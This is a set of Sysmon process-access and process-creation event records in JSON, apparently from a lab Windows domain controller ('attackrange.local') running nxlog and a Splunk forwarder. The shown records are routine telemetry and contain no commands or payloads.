{"EventTime":"2020-08-01 06:59:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7126,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:57.556\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:57.556","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7127,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:57.855\r\nProcessGuid: {E2A3D6B1-12ED-5F25-0000-0010946C0A00}\r\nProcessId: 3840\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:59:57.855","ProcessGuid":"{E2A3D6B1-12ED-5F25-0000-0010946C0A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:59:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7128,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:57.853\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-12ED-5F25-0000-0010946C0A00}\r\nTargetProcessId: 3840\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:57.853","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-12ED-5F25-0000-0010946C0A00}","TargetProcessId":"3840","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7129,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:57.853\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12ED-5F25-0000-0010946C0A00}\r\nTargetProcessId: 3840\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:57.853","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12ED-5F25-0000-0010946C0A00}","TargetProcessId":"3840","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7130,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:57.853\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:57.853","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7131,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:57.853\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:57.853","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7132,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:57.853\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:57.853","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7133,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:57.853\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:57.853","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
